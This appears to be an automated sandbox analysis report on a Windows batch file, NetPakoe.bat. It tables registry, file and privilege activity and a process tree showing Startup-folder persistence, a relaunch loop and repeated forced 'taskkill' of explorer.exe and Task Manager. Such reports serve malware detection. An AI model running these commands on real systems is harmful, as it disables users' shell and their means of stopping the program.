| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{1EAF4BB5-CBD3-41EA-B850-B80B78B729F2} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{B5966072-D909-4EFE-85E8-E09EE48390BD} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{80852F6A-0A13-4C4C-A60E-7F2200D44B56} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{04814A63-8BE9-4644-A350-548370E1C5B4} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{B699431B-14AA-4B85-8FEA-547992CEABB7} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{A87C93D7-4A78-4DC5-A4C1-97BC1B96D899} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{FE7E43B7-7BB6-4B05-81AF-5CA7596ED476} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{10D2CA1F-5974-422C-89A3-FCB978C5C0CC} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{F1C3C17C-D049-4849-8958-DCDF01D702BA} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{E6735B21-312C-4A3C-BAF2-AECBA094823C} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{A99CA888-4827-46A3-8BFB-1FE1D652C5B3} | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe.bat" |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
